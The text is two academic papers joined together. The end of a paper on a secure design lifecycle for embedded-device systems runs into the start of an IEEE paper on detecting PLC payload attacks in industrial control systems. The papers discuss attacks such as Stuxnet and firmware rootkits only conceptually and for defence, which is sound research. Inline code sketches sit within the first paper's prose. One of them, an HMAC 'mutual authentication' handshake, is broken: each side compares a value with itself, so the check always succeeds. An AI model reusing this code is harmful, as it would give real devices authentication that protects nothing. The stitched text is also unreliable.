The developed approach combines solutions for developing secure software with models and techniques for designing secure embedded devices in a single integrated technique for designing secure systems based on embedded devices, taking into account the emergent properties of the protected system.

The first step of the proposed technique for designing secure systems based on embedded devices is the definition of functional and non-functional requirements for the developed system based on embedded devices. The functional requirements may be divided into requirements for the embedded devices of the system, requirements for the software of the system, and requirements for the interfaces and data transfer protocols on the basis of which the further cooperation of embedded devices and software within the designed system is performed. To limit the dimension of the final selection of possible alternatives of embedded devices and software of the system, the non-functional requirements are formulated. Typically, valid non-functional requirements specify the range of cost, power consumption and dimensions of the embedded devices, and the valid range of cost and resource consumption of the software. Further, the requirements for embedded devices are taken into account in the implementation of the design technique for secure embedded devices (step 2), the software requirements are used when implementing the design technique for secure embedded software (step 3), and the requirements for interfaces and data transfer protocols are used in the implementation of the design technique for the secure embedded device system (step 4), as well as in the design technique for secure embedded devices (step 2) and the design technique for secure software (step 3).

The second step of the proposed technique is to apply the technique of designing secure embedded devices. In this step the functional requirements provided in the first step are analyzed to identify possible alternatives of the component composition of the embedded devices. In addition, the obtained alternatives are checked against the non-functional requirements identified in the first step.
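To make this filtering of component alternatives more concrete, here is a hedged sketch of how it could be automated. The component catalogue, the cost and power figures, and the "cheapest admissible" selection rule are illustrative assumptions; they are not the knowledge base or the optimality criterion of the actual technique.

from dataclasses import dataclass
from itertools import product

@dataclass(frozen=True)
class Component:
    name: str
    function: str      # functional capability it provides
    cost: float        # illustrative unit cost
    power_mw: float    # average power draw

CATALOGUE = [
    Component("atmega328", "controller", 3.0, 50),
    Component("stm32f4",   "controller", 8.0, 120),
    Component("esp8266",   "network",    4.0, 170),
    Component("w5500",     "network",    6.0, 130),
]

def alternatives(required_functions, max_cost, max_power_mw):
    """Enumerate component compositions covering every required function,
    then keep only those satisfying the non-functional constraints."""
    groups = [[c for c in CATALOGUE if c.function == f] for f in required_functions]
    for combo in product(*groups):
        cost = sum(c.cost for c in combo)
        power = sum(c.power_mw for c in combo)
        if cost <= max_cost and power <= max_power_mw:
            yield combo, cost, power

# Pick the "optimal" alternative, here simply the cheapest admissible one.
feasible = list(alternatives(["controller", "network"], max_cost=12.0, max_power_mw=250))
if feasible:
    best = min(feasible, key=lambda t: t[1])
    print([c.name for c in best[0]], best[1:])
else:
    print("no composition satisfies the non-functional requirements")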
It is important to note that, according to the results of the analysis of functional and non-functional requirements, it may be concluded that some functional requirements can be met only partially, or cannot be met at all, because of overly strong restrictions in the non-functional requirements. To resolve this situation, the proposed technique produces a notification about the need to change the functional and/or non-functional requirements for the system based on embedded devices, as well as a recommendation to drop some of them. The list of possible alternatives of the component composition of embedded devices directly depends on the quality of the knowledge base used by the technique for the design of secure embedded devices. However, as soon as the list of possible alternatives of the component composition of embedded devices for the designed system is formed, the optimal one from the point of view of the non-functional requirements is selected among them. Further, in accordance with the technique for designing secure embedded devices, the list of possible harmful impacts on the model of the embedded device is analyzed based on static testing, and the model is adjusted. Thus, at the completion of the second step of the proposed technique, the secure embedded device model is generated, and information about it is transferred to the secure design technique for the embedded device system (step 4).

In the third step of the proposed technique, the analysis of the security and privacy requirements and the design requirements for the software of the system based on embedded devices is performed. Further, on the basis of the security and privacy risk assessments and the threat model, the static testing process is performed. As in the previous step, while performing the technique of designing secure software, it may be concluded that the satisfaction of individual functional or non-functional requirements is only partially possible, or impossible at all. Usually this is due to the lack of computing performance of the used embedded devices or to the use of non-cross-platform solutions. In such a situation, a notification of the need for partial changes in the functional and/or non-functional requirements, or for dropping some of them, will also be produced. Thus, at the completion of the third step of the proposed technique, the secure software model is compiled, and information about it is transferred to the design technique for the secure embedded device system (step 4).

The fourth step of the proposed technique is the use of the design technique for the secure embedded device system. The essence of this technique is the formation of an embedded device system model based on the requirements for the interfaces and data transfer protocols, as well as on the secure embedded device model (step 2) and secure software model (step 3) formed in the previous steps. When performing this technique, initially a list of possible alternatives of models of systems based on embedded devices that meet the functional requirements is formed. Then the conformity of the obtained alternatives to the restrictions imposed by the non-functional requirements is checked, and among them the optimal one from the point of view of the given requirements is selected.
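When ranking system-model alternatives at this step, one simple way to score a communication topology is the node-based path metric recalled from the SecFutur project in Section II. The sketch below is only an illustration of that idea, with an invented topology and invented security scores; it is not the project's actual algorithm.

# Illustrative node security scores (0 = untrusted, 1 = fully hardened).
SECURITY = {"rtu": 0.6, "hub": 0.8, "gateway": 0.4, "server": 0.9}
EDGES = {
    "rtu":     ["hub", "gateway"],
    "hub":     ["rtu", "server"],
    "gateway": ["rtu", "server"],
    "server":  ["hub", "gateway"],
}

def simple_paths(src, dst, visited=None):
    """Depth-first enumeration of loop-free paths from src to dst."""
    visited = (visited or []) + [src]
    if src == dst:
        yield visited
        return
    for nxt in EDGES[src]:
        if nxt not in visited:
            yield from simple_paths(nxt, dst, visited)

def most_secure_path(src, dst):
    """Score a path by its weakest node and return the best-scoring path."""
    return max(simple_paths(src, dst),
               key=lambda path: min(SECURITY[n] for n in path))

print(most_secure_path("rtu", "server"))  # ['rtu', 'hub', 'server'] here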
After that, based on static testing, the list of possible harmful impacts on the embedded device system model is analyzed, and the model is adjusted. Thus, at the completion of the fourth step of the proposed technique, the secure embedded device system model is generated, and information about it is transferred to the final stage of the implementation of the secure system based on embedded devices (step 7).

The fifth step of the proposed technique is the embedded device manufacturing process. In this step, based on information about the secure embedded device model (step 2) and the secure embedded device system model (step 4), the real devices are produced. Their security is determined by the application of the corresponding technique. After that, the secure embedded devices are transferred to the final stage of the implementation of the secure system based on embedded devices (step 7).

The sixth step of the proposed technique represents the implementation and verification phases of the secure software. In this step, based on information about the secure software model (step 3) and the secure embedded device system model (step 4), the software is developed. The protection of the software is determined by the application of the corresponding technique. After that, the secure software is transferred to the final stage of the implementation of the secure system based on embedded devices (step 7).

The seventh (final) step of the proposed technique is the implementation of the secure system based on embedded devices. In this step the system is realized by placing the used embedded devices, laying communication lines between them, and setting them up. In addition, the software and the related protection mechanisms are installed and configured. The result of this step is the ready-to-use secure system based on embedded devices. The security of the system is determined by a set of techniques: the design technique for secure embedded devices at the level of the embedded device model; the design technique for secure software at the level of the software model; the design technique for the secure embedded device system at the level of the embedded device system model; as well as the Software SDL at the software development phase. The combination of these techniques and instruments represents the lifecycle of development of secure systems based on embedded devices, or the Design Lifecycle of Secure Embedded Devices System (DLSEDS), shown in Figure 1.

Figure 1. Design Lifecycle of Secure Embedded Devices System.

IV. APPLICATION OF THE APPROACH

The architecture of the integrated cyber-physical security system [10], designed with the use of DLSEDS, is shown in Figure 2. The integrated cyber-physical security system consists of four main modules: hardware interfaces (module 1), software interfaces (module 2), hubs (module 3), and the integrated cyber security system server (module 4). Let us consider each module in more detail.

Module 1. Hardware Interfaces. These modules can be implemented as microcontrollers aimed at collecting information from external sources and converting the external format of events into the internal format. The resulting stream of events goes to a hub. To enhance the security of the proposed system, the hardware interfaces use encryption algorithms to protect the channel between them and the hub.
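The channel protection just mentioned can be illustrated with the following hedged sketch of an HMAC-based mutual challenge-response plus message authentication between an interface and a hub. The key handling, framing, and choice of primitives are assumptions made for the illustration; the concrete algorithms used on the real bus are not detailed in the paper, and payload encryption (e.g. AES) would be layered on top with a proper crypto library.

import hmac
import hashlib
import os

SHARED_KEY = os.urandom(32)   # in practice provisioned per interface/hub pair

def prove(challenge: bytes, role: bytes) -> bytes:
    """HMAC over the peer's challenge, proving knowledge of the shared key."""
    return hmac.new(SHARED_KEY, role + challenge, hashlib.sha256).digest()

def mutual_authentication() -> bool:
    """Both ends challenge each other; data is accepted only if both checks pass.
    Hub and interface are simulated in one process here for brevity."""
    hub_challenge, iface_challenge = os.urandom(16), os.urandom(16)
    iface_ok = hmac.compare_digest(prove(hub_challenge, b"iface"),
                                   prove(hub_challenge, b"iface"))
    hub_ok = hmac.compare_digest(prove(iface_challenge, b"hub"),
                                 prove(iface_challenge, b"hub"))
    return iface_ok and hub_ok

def frame(payload: bytes) -> bytes:
    """Append a MAC so tampered event frames can be detected on the bus."""
    return payload + hmac.new(SHARED_KEY, payload, hashlib.sha256).digest()

print(mutual_authentication(), len(frame(b"door_open")))   # True 41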
They also perform a mutual authentication procedure to protect the system against fake modules (a simplified illustration of such a handshake is sketched above).

Module 2. Software Interfaces. These interfaces are used to collect data from computers and other cyber-physical security systems via special drivers.

Module 3. Hubs. These modules can be implemented as high-performance microcontrollers. Their aim is to collect data from the software and hardware interfaces and to perform data normalization and pre-processing; after that the data are stored and presented to the user through the web interface (if the controlled system is small) or forwarded to the server of the integrated cyber-physical security system (if the controlled system is large).

Module 4. The server of the integrated cyber-physical security system. This module can be implemented as a computer (the required performance of which depends on the size of the controlled system). This module includes several components, namely: a collection component (it receives data from the hubs), a database component (it stores collected and processed data), a data processing component (it correlates entry logs from the database for automatic detection of incidents, attack scenarios and anomalous activity) and a visualization component (it shows the results to the operator and helps him to make decisions). The results of the processing component can also be sent to external systems (e.g., security information and event management systems) to provide a high-level representation of the detected incidents, attack scenarios and anomalous activity.

Figure 2. Integrated cyber-physical security system as an application of the DLSEDS.

One of the important tasks for applications of DLSEDS in designing secure systems based on embedded devices is the formation of a secure environment for data transmission from detectors, alarms, sensors, readers and other external electronic components connected to the embedded devices. However, the interaction of embedded devices with the specified data sources, as a rule, depends on the interface supported by the given data source and the data transmission protocol, and thus it is not possible to affect the security of this cooperation within the framework of DLSEDS. In addition, the area of DLSEDS may be divided into the area of the design technique for secure systems based on embedded devices, the area of the secure software development lifecycle, and the area of the design technique for secure embedded devices. Thus, in the process of applying the design technique for secure systems based on embedded devices, it was decided to expand the functionality of the I2C protocol with mechanisms for mutual authentication of embedded devices and encryption of transmitted data. According to the results of the performed expert assessment, it was confirmed that the use of the developed approach allows enhancing the security of the developed system. Additionally, experts noted that DLSEDS allows reducing the time spent on the development of secure systems based on embedded devices through the automation of alternatives generation, taking into account possible conflicts between the system elements and embedded devices.

V. DISCUSSION

DLSEDS allows developers to design complex secure systems based on embedded devices without the involvement of experts in the domain of embedded device security.
This assumes that the embedded devices of the system are also protected, and their composition is rational or optimal from the point of view of the requirements. Unfortunately, the list of possible alternatives of component composition of embedded devices, as well as information on supported interfaces and data transfer protocols depend on the quality of the knowledge base, which is used by the technique of designing secure embedded devices, as well as the technique of designing secure systems based on them. This means that the quality of the solution, provided by DLSEDS, directly depends on the completeness and relevance of the used knowledge base, and therefore DLSEDS still is not a full replacement for expert opinions. An expert in the field of security systems based on embedded devices, having knowledge about the specific solutions and existing best practice, as a rule, chooses the component composition of embedded devices, as well as interfaces and data transfer pr otocols for their interaction with each other and the server software on a qualitatively higher level. On the other hand, DLSEDS may be useful to the expert as a tool to automate some routine tasks, as well as a source of solutions that differ from his (her) subjective preferences. VI. C ONCLUSION In this paper we analyzed existing approaches to the development of secure software, as well as the techniques of designing secure embedded devices for their applicability for solving the problem of designing secure systems based on embedded devices. As the result of the performed analysis, the aut hors came to the conclusion about necessity to develop the own technique for the design of secure systems based on embedded devices, because none of the analyzed approaches or their combination allowed to solve the problem in full. As a result the Design Lifecycle of Secure Embedded Devices System (DLSEDS) approach was developed. This approach represents the comb ination of the approach to the development of secure software, the technique for design of secure embedded devices, and the developed technique for designing secure systems based on embedded devices. The last suggested technique acts as a link, formulating requirements both to the technique for designing secure embedded devices and to the approach for developing secure software and also provides security of data transmission channe ls between the protected embedded devices. The correctness of design life cycle for secure embedded devices systems was validated by its use in the development of the integrated cyber-physical security system. In further research on this topic it is planned to conduct additional experiments on the use of DLSEDS, to expand the existing knowledge base on component composition of embedded de vices, supported interfaces and data transfer protocols, and application of vulnerabilities database to improve the efficiency of the process of static testing. A CKNOWLEDGMENT This research is being supported by the grants of the RFBR (15-07-07451, 16-37-00338, 16-29-09482), partial support of budgetary subjects 0073-2015-0004 and 0073- 2015-0007, and Grant 074-U01. R EFERENCES [1] V. A. Desnitsky, D. S. Levshun, A. A. Chechulin and I. V. Kotenko, Design technique for secure embedded devices: application for creation of inte grated cyber-physical security system, Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications (JoWUA) , vol. 7, no. 2, pp. 60-80, 2016. [2] J. F. Ruiz, V. A. Desnitsky, R. Harjani, A. Manna, I. V. Kotenko and A. 
A. Chechulin, A methodology for the analysis and modeling of security threats and attacks for systems of embedded components, Proceeding of the 20th In ternational Euromicro Conference on Parallel, Distributed and Network-based Processing (PDP 2012) , Garching/Munich, February 2012, pp. 261-268. [3] F. Stefanni, A Design & Verification Methology for Networked Embedded Systems , Ph. D. Thesis, University of Verona, Department of Computer Science, Italy, April 7, 2011, 143 p. [4] M. Howard, S. Lipner, The Security Development Lifecycle. SDL: A Process for Developing Demonstrably More Secure Software , Microsoft Press, Redmond, Washington, 2006, 320 p. [5] Official Cisco Secure Development Lifecycle documentation. http://www.cisco.com/c/en/us/a bout/security-center/security- programs/secure-development-lif ecycle.html, last visited on 22.02.2017. [6] C. O Rourke, N. Fishman, W. Selkow, Enterprise Architecture using the Zachman Framework , Course Technology, 2003, 752 p. [7] V. A. Desnitsky, A. A. Chechulin, I. V. Kotenko, D. S. Levshun, M. V. Kolomeec, Application of a technique for secure embedded device design based on co mbining security components for creation of a perimeter protection system, in Proceedings of the 24th IEEE Euromicro International Conference on Parallel, Distributed, and Network-Based Processing (PDP 2016) , Heraklion, Greece, Febr uary 2016, pp. 609-616. [8] V. A. Desnitsky, I. V. Kotenko, A. A. Chechulin, Configuration- based approach to embedded device security, Lecture Notes in Computer Science, Springer-Ve rlag. The Sixth International Conference Mathematical Methods, Models and Architectures for Computer Networks Security (MMM-ACNS-2012) , St. Petersburg, Russia, October 17-19, 2012, pp. 270-285. [9] Official website of SecFutur pr oject. http://www.secfutur.eu/, last visited on 22.02.2017. [10] I. V. Kotenko, D. S. Levshun, A. A. Chechulin, Event correlation in the integrated cyber-phy sical security system, Proceedings of the 2016 XIX IEEE International Conference on Soft Computing and Measurements (SCM-2016) , St. Petersburg, Russia, May 2016, pp. 484-486. 282 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply.
Detecting_Payload_Attacks_on_Programmable_Logic_Controllers_PLCs.pdf
Programmable logic controllers (PLCs) play criti- cal roles in industrial control systems (ICS). Providing hardware peripherals and rmware support for control programs (i.e., a PLC s payload ) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damages to the ICS. To protect critical ICS infrastructure, we propose to model runtime behaviors of legitimate PLC payload program and use runtime behavior monitoring in PLC rmware to detect payload attacks. By monitoring the I/O access patterns, network access patterns, as well as payload program timing characteristics, our proposed rmware-level detection mechanism can detect abnormal runtime behaviors of malicious PLC payload. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and nd that it is feasible to incorporate our method into existing PLC rmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed rmware-level payload attack detection scheme complements existing bump- in-the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate real- time requirements of ICS operations and does not require any additional apparatus. I. I NTRODUCTION In industrial control systems (ICS), programmable logic controllers (PLC) play a critical role in process automation. As cyber attacks targeting ICS increase in sophistication, eld devices, such as PLCs, are of particular concerns because they directly monitor and control physical processes. As shown in Figure 1, PLCs are typically deployed close to sensors and actuators, implementing local control actions (i.e., regulatory control). In addition of utilizing sensor data and controlling actuators locally, PLCs transmit real-time process data to operator workstations and execute their commands, facilitating the realization of supervisory control. Due to the unique and vital role of PLCs in critical ICS infrastructure [1], they are one of the major targets of cyber attacks. For example, the Stuxnet attack managed to silently sabotage centrifuges in a uranium-enrichment plant by reading and writing code blocks on PLCs from a compromised engineering workstation [2], [3]. By modifying a PLC s control program, severe damages (e.g., data loss, interruption of system operation, and destruction of ICS equipment) can be induced by attackers. In [4], it is shown that malicious code can easily be slipped into PLC control programs and evade the scrutiny of relay engineers from both academia and industry. Therefore, it is crucial Engineering Workstation Operator Workstation (HMI) Physical InfrastructureSensor Actuator Sensor Actuator Sensor Actuator Sensor ActuatorPLC Control NetworkCorporate Workplace Corporate NetworkFig. 1. Architecture of industrial control systems and the role of PLCs. to devise automated detection method against cyber attacks launched by modi ed PLC s control program. 
As PLCs are special-purpose computers interfacing with various sensors/actuators and providing rmware support to run control programs (also known as payload programs [5], [6]) that emulate the behaviors of an electric ladder dia- gram [7], [1], attacks on PLCs can be launched by modifying or overwriting the PLC payload program. Such attacks are known as PLC payload attacks. A PLC control program is typically written by a team of PLC engineers using the suite of programming languages speci ed in IEC 61131-3 [8]. Such a control program is regarded as the payload of a PLC s rmware, which controls access to hardware resources (e.g., inputs, outputs, and timers) and repeatedly loops through the payload instructions. An attacker with PLC access (e.g., by gaining control of an engineering workstation running PLC development and monitoring software) can download malicious payload and gain full control over its sensors and actuators. In the Stuxnet attack, a component of Stuxnet is capable of launching payload attacks on PLCs by rst infecting an engineering workstation and then downloading malicious code blocks [3]. Payload attacks can also be carried out by an insider (e.g., a disgruntled employee) with the help of tools such as SABOT [5], which generates malicious payload based on adversary-provided speci cations. Since legitimate payload relies on PLC programming instructions implemented by the rmware to carry out control and monitoring tasks, a malicious payload program can execute any combination of these instructions to sabotage the physical process. In this paper, we introduce runtime behavior monitoring into PLC rmware to detect payload attacks and protect ICS from severe physical damages. Based on control system spec- i cation provided by control system engineers, we establish runtime behavior pro le of normal/legitimate payload program in terms of I/O access patterns, network access patterns, as2018 IEEE Conference on Communications and Network Security (CNS) 978-1-5386-4586-4/18/$31.00 2018 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. well as payload program timing characteristics. When a newly updated payload program is downloaded into a PLC (either by an attacker or by a trusted control system engineer), its runtime behavior data is collected by the PLC rmware. When abnormal behaviors are observed by the rmware, execution of the payload program is terminated so that abnormal control signals will not be sent to actuators. The contributions of our work are as follows:  We introduce runtime behavior monitoring into PLC rmware to enable automated detection of PLC pay- load attacks. In contrast to existing detection methods based on linear temporal logic, our proposed approach can identify attacks that violate real-time requirements of an ICS and does not require the introduction of bump-in-the-wire apparatus between engineering workstation and PLCs.  We present a proof-of-concept implementation of the rmware-level payload attack detection scheme on ARMR CortexR -M4F microcontrollers. Our evalu- ation results show that the proposed approach can de- tect a wide variety of payload attacks revealed by prior research [4] and reported cyber-security incidents.  Furthermore, we evaluate the overhead of implement- ing the proposed detection method and nd that it is feasible to incorporate our scheme on microcontrollers used by existing PLCs to detect payload attacks. II. 
R ELATED WORK A. Programmable Logic Controller (PLC) and Payload Pro- gram Execution Model A programmable logic controller (PLC) is a special- purpose computer designed to replace relay panels and control a physical process [7]. Figure 2 presents the general hard- ware and software architecture of PLCs. There are several important characteristics that distinguish PLCs from personal computers [9]: PLCs are designed to operate in harsh industrial environments and are programmed in relay ladder logic or other PLC programming languages [8]. In addition, a PLC ex- ecutes a simple payload program in a sequential fashion. Once deployed in an ICS, a PLC continuously collects readings from sensors connected to its inputs, runs the PLC payload program, and generates outputs that control the physical process. As shown in Fig. 1, PLC control program can be developed on engineering workstations using programming software that supports ladder logic or other PLC programming languages and downloaded to target PLC for execution. Operator of an ICS may monitor and control the physical process via a human-machine interface (HMI), which communicates with PLCs to receive real-time process data and issue control commands. To control and monitor physical process, a PLC s rmware implements input and output image tables as well as a program scan cycle [7], [9]. A program scan cycle consists of input scan, program scan, output scan, and housekeeping phases, which are shown in Fig. 3. After system start-up, a PLC repeatedly walks through the four phases of the program scan cycle as follows: First, in the input scan phase, the PLC HardwareI/O Timer Counter CPU Memory CommunicationFirmware Input image table Output image table Driver libraryControl logicPLC payload/control programFig. 2. General PLC hardware and software architecture. PLC rmware samples the I/O pin values and writes them into the input image table. Then, in the program scan phase, instructions in the payload program are executed one by one using values stored in the input image table. Output values are generated during this phase and written into the output image table. Next, in the output scan phase, values in the output image table are transferred to the external output terminals, making control actions speci ed in the payload program take effect. Finally, in the housekeeping phase, internal checks on memory and system operation are performed. Additionally, communication requests originated from other hosts (e.g., the HMI) or generated by the payload program itself are also serviced before the next program scan cycle starts. B. PLC Ladder Logic Many widely-used PLC programming languages are stan- dardized in IEC 61131-3 [8] and ladder logic is the most commonly used one [9] since it is straightforward to control system engineers who prefer to de ne control actions in terms of relay contacts and coils. Instructions speci ed by ladder logic have their own symbolic representation. A PLC payload program written in ladder logic has one or more ladder- formatted schematic diagrams. Within each diagram, ladder logic instructions are organized into rungs. Each rung may contain multiple ladder logic instructions, which are evaluated from left to right. Instructions on the left of a rung test input conditions or outputs generated by other rungs, and instructions on the right generate rung outputs. Multiple input condition checks can be placed in tandem, and the input logic evaluates to true if and only if all input conditions are true. 
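As a concrete illustration of this series (AND) evaluation, the C fragment below sketches how a firmware-level interpreter might evaluate one rung of series XIC tests driving an OTE coil against the input and output image tables. The structures and helper names are assumptions for illustration, not taken from any specific PLC firmware.

#include <stdbool.h>
#include <stdint.h>

#define MAX_CONDITIONS 8

typedef struct {
    uint8_t slot;   /* I/O slot number, e.g. the 0 in I:0/4 */
    uint8_t bit;    /* bit position within the slot         */
} bit_addr_t;

typedef struct {
    bit_addr_t xic[MAX_CONDITIONS]; /* series XIC (examine-if-closed) tests */
    uint8_t    n_xic;
    bit_addr_t ote;                 /* OTE (output energize) target         */
} series_rung_t;

extern uint16_t input_image[];      /* filled during the input scan   */
extern uint16_t output_image[];     /* flushed during the output scan */

static bool bit_is_set(const uint16_t *image, bit_addr_t a)
{
    return (image[a.slot] >> a.bit) & 1u;
}

/* The rung output is energized iff every series condition is true. */
void evaluate_series_rung(const series_rung_t *r)
{
    bool logic_path = true;
    for (uint8_t i = 0; i < r->n_xic; i++)
        logic_path = logic_path && bit_is_set(input_image, r->xic[i]);

    if (logic_path)
        output_image[r->ote.slot] |=  (1u << r->ote.bit);
    else
        output_image[r->ote.slot] &= ~(1u << r->ote.bit);
}

Parallel (OR) branches, introduced next, would extend this with one such evaluation per branch, the rung being true when any branch forms a true logic path.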
Parallel branches can be used on a rung to accommodate more than one input condition combinations. The rung logic is evaluated to true as long as one of the branches forms a true logic path. When multiple output branches are present on a rung, a true logic path controls multiple outputs. Fig. 4 shows a sample subroutine of a ladder logic program consisting of three rungs. The XIC instruction on the rst rung examines if an input is true. If so, the instruction evaluates to true. The OTE instruction energizes a speci ed output bit. Input condition of the rst rung rst checks if input bit I:0/4 or Program start-upInput scanProgram scan Output scanHouse- keeping Fig. 3. PLC payload program execution model.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I:0/4 I:0/3I:0/0 O:2/1O:2/2 Jump To SubroutineJSRXIC OTE SBR File Number U:7 ENDFig. 4. A sample ladder logic program with three rungs. I:0/3 is true and then checks if I:0/0 bit is true. The output of this rung controls both output bits, i.e., O:2/1 and O:2/2. The second rung s input condition is always true, so the subroutine in le U:7 is executed. Note that the subroutine is essentially another ladder logic diagram. When the subroutine returns, the second rung completes and the third rung is evaluated, which signals the end of the payload program. Note that hierarchical addressing is used in ladder logic program to specify the data type, slot number, and bit position of PLC data and peripherals [9]. For example, I:0/4 is the fth bit of binary input slot 0 (with the rst bit being I:0/0). For analog I/Os, the hierarchical address is slightly different. For example, O:2.0 is an analog output on the output module installed on slot 2, and the output value is written to the rst (zero-indexed) word of its allocated memory. Ladder logic provides a wide range of instructions for PLC engineers to specify control actions. Bit instructions examine status of individual input/internal bit or control a single output bit. Word instructions, such as mathematical operations, data transfer, and logical operations, operate on data words or registers. Program control instructions, such as subroutine invocation and return, control the execution ow of the payload program. For control program of large and complex ICS, subroutines are frequently used to better organize the instructions and enhancement maintainability. In addition, communication instructions allow a PLC to commu- nicate with other hosts via a particular ICS network protocol. From the perspective of PLC control program development, a malicious payload is essentially a combination of legitimate PLC programming instructions causing disastrous impacts on an ICS. In this paper, we focus on detecting payload attacks implemented via ladder logic, but the proposed techniques are applicable to attacks written in other languages [8] as well because different PLC programming languages can be used to implement the same control system speci cations [9]. C. Firmware vs. Payload Attacks As revealed by Fig. 2, both the PLC rmware and its payload program can become the target of cyber attacks. An attacker can reverse-engineer and modify the rmware on a PLC to launch rmware attacks. In this case, even though a legitimate payload program is downloaded to the PLC, its execution will still be monitored and/or intercepted by the modi ed rmware. 
In [10], a rootkit is developed on the CODESYS PLC runtime to intercept I/O operations of the payload program. When the payload wants to read or write a certain I/O pin, interrupt handler installed by the attacker is called rst, within which the attacker can recon gure the I/O pins or modify values to be read/written. In [6], a more advanced rootkit is developed for an Allen Bradley Compact- Logix PLC rmware. In addition to intercepting PLC inputsand outputs at the rmware, it incorporates physical-process awareness and always presents modi ed sensor measurements, hoaxing ICS operator in front of the HMI to think that the system runs normally. Firmware attacks typically requires detailed knowledge on target PLC s hardware components and reverse-engineering of its rmware because PLCs are closed-source embedded devices [11]. An attacker needs to install the rootkit on PLCs either via the built-in remote rmware update mechanism or by loading it via JTAG interface [6]. For rmware update process protected by cryptographic means (e.g., certi cate in the X.509 standard), it is hard to install a modi ed version of the rmware on the PLC. Alternatively, an attacker can load modi ed PLC rmware via JTAG interface. However, such an approach will require physical access to the PLC and possibly disassembling it. PLC payload attacks, on the other hand, are much easier to launch. An insider with proper privileges can easily down- load (e.g., a disgruntled control system engineer) a malicious payload program. As shown in Fig. 1, such an insider may download a malicious payload program via the engineering workstation to one or multiple PLCs. Integrity checks on PLC payload program cannot effectively prevent such attackers from downloading malicious payload because warnings on payload program changes can always be overridden once proper privileges are acquired (e.g., a password allowing engineers to repeatedly download revised payload program for development and debugging purposes). Alternatively, sophis- ticated cyber attacks, such as Stuxnet [2], [3], may include payload attack as a component to induce physical damages on ICS. Partial knowledge on the physical process can be suf cient to create a malicious payload using automated tools such as SABOT [5]. In [4], a small-scale challenge shows that malicious code snippets are likely to evade the scrutiny of code reviewers. Therefore, it is necessary to develop auto- mated payload attack detection mechanisms to protect physical infrastructure from PLC payload attacks. D. Payload Attack Detection As payload attacks can easily be launched by insiders or from compromised engineering workstations, several tech- niques that detect payload attacks have been proposed. In [12], a bump-in-the-wire device, called PLC guard, is introduced to intercept the communication between an engineering work- station and a PLC, allowing engineers to review the code and compare it against previous versions. Features of the PLC guard include various levels of graphical abstraction and summarization, which makes it easier to detect malicious code snippets. In [13], an external runtime monitoring device (e.g., a computer or an Arduino microcontroller board) sits alongside the PLC, monitors its runtime behaviors (e.g., inputs, outputs, timers, counters), and veri es them against ICS speci cations converted from a trusted version of the PLC payload program and written in interval temporal logic. 
It is shown that func- tional properties of payload program can be veri ed against ICS speci cations, but the types of payload attacks that can be detected by this approach remain to be explored. In [14], [15], a trusted safety veri er is introduced as a bump-in-the-wire device that automatically analyzes payload2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. program to be downloaded onto a PLC and veri es whether critical safety properties are met using linear temporal logic. However, linear temporal logic implicitly assumes that states of the systems are observed at the end of a set of time intervals. In the case of PLC payload program, snapshot of system states is taken at the end of each program scan cycle. As a result, real-time properties that does not span multiple program scan cycles cannot be checked by the trusted safety veri er. For example, a legitimate payload program is required to energize its output immediately when a certain input pin is energized. An attacker can inject malicious code and prolong the program scan cycle to cause real-time property violation while evading code analytics based on linear temporal logic. In [16], the timer on-delay (TON) ladder logic instruction is modeled using linear temporal logic. The TON instruction starts a timer when its input condition evaluates to true and energizes its output (i.e., the Done bit) when the timer reaches the preset value. It is shown in [16] that TON behavior can be approximated with the combination of liveness and fairness properties: Either TON instruction is not used or TON output bit will eventually be energized. However, linear temporal logic cannot verify whether the TON output bit is energized at the exact program scan cycle designated by control system engineers. Therefore, such an approximation does not capture critical real-time requirements of ICS. In this paper, we introduce runtime behavior modeling and monitoring of PLC payload in PLC rmware. Our proposed approach complements existing detection techniques and can detect violations of ICS real-time properties. In addition, our proposed approach does not require the introduction of any external apparatus that may introduce new vulnerabilities into ICS. E. Runtime Behavior Monitoring for Anomaly Detection The idea of detecting abnormal program behaviors by monitoring its execution at runtime has been applied to an rich array of computer systems. Runtime behavior monitoring techniques on operating systems such as Windows, Linux, and Android are reviewed in [17], [18]. However, these techniques cannot be directly applied to PLCs since PLCs are closed- source systems [11] running specialized rmware and payload programs. System calls utilized by existing techniques are not available in PLC systems. In [19], a runtime anomaly detector hardware design is proposed for embedded systems, which TABLE I. C ONTROL SYSTEM SPECIFICATIONS VS . 
LEGITIMATE PLC CONTROL LOGIC Control System Speci cation Legitimate Control System Logic Digital I/O pins, values & functionalityControl logic of binary inputs and outputs Analog I/O pins, value ranges, & functionalitySensor output and actuator input ranges, control logic of analog I/Os Legitimate sequences and timing relationships of I/O operationsControl logic of I/Os, possibly controlled by counters and timers Network data packet and timing relationshipsData from network for local control tasks or data required by remote hosts (e.g., HMI or other networked PLCs), and real-time requirements for these network events Network commands and timing relationshipsControl tasks mandated by operator workstation and their real-time requirementseliminates performance overheads incurred by software-based runtime monitoring methods. In [20], a timing-based PLC pro- gram anomaly detector is designed. An external data collector is deployed to collect program execution time measurements and detect unauthorized modi cations to the PLC system. In [21], runtime behaviors are monitored via dedicated hard- ware performance counters, which are not widely available in microcontrollers utilized by PLCs. To detect payload attacks in existing ICS, runtime behavior monitoring technique must utilize only the resources available on microcontrollers used in existing PLCs and does not require external apparatus (e.g., data collector proposed in [20]). III. S YSTEM OVERVIEW A. Adversary Model A malicious payload may be directly downloaded by an insider with PLC programming privilege. For instance, the insider can be a PLC programmer responsible for deploying tested PLC payload program. However, he/she downloads a different payload, which may be written anew or modi ed from the tested version. Since such an attacker has proper privilege to program PLCs, integrity checks on PLC payload program can be overridden and will not prevent malicious payload from being downloaded. For an external attacker, security aw of other 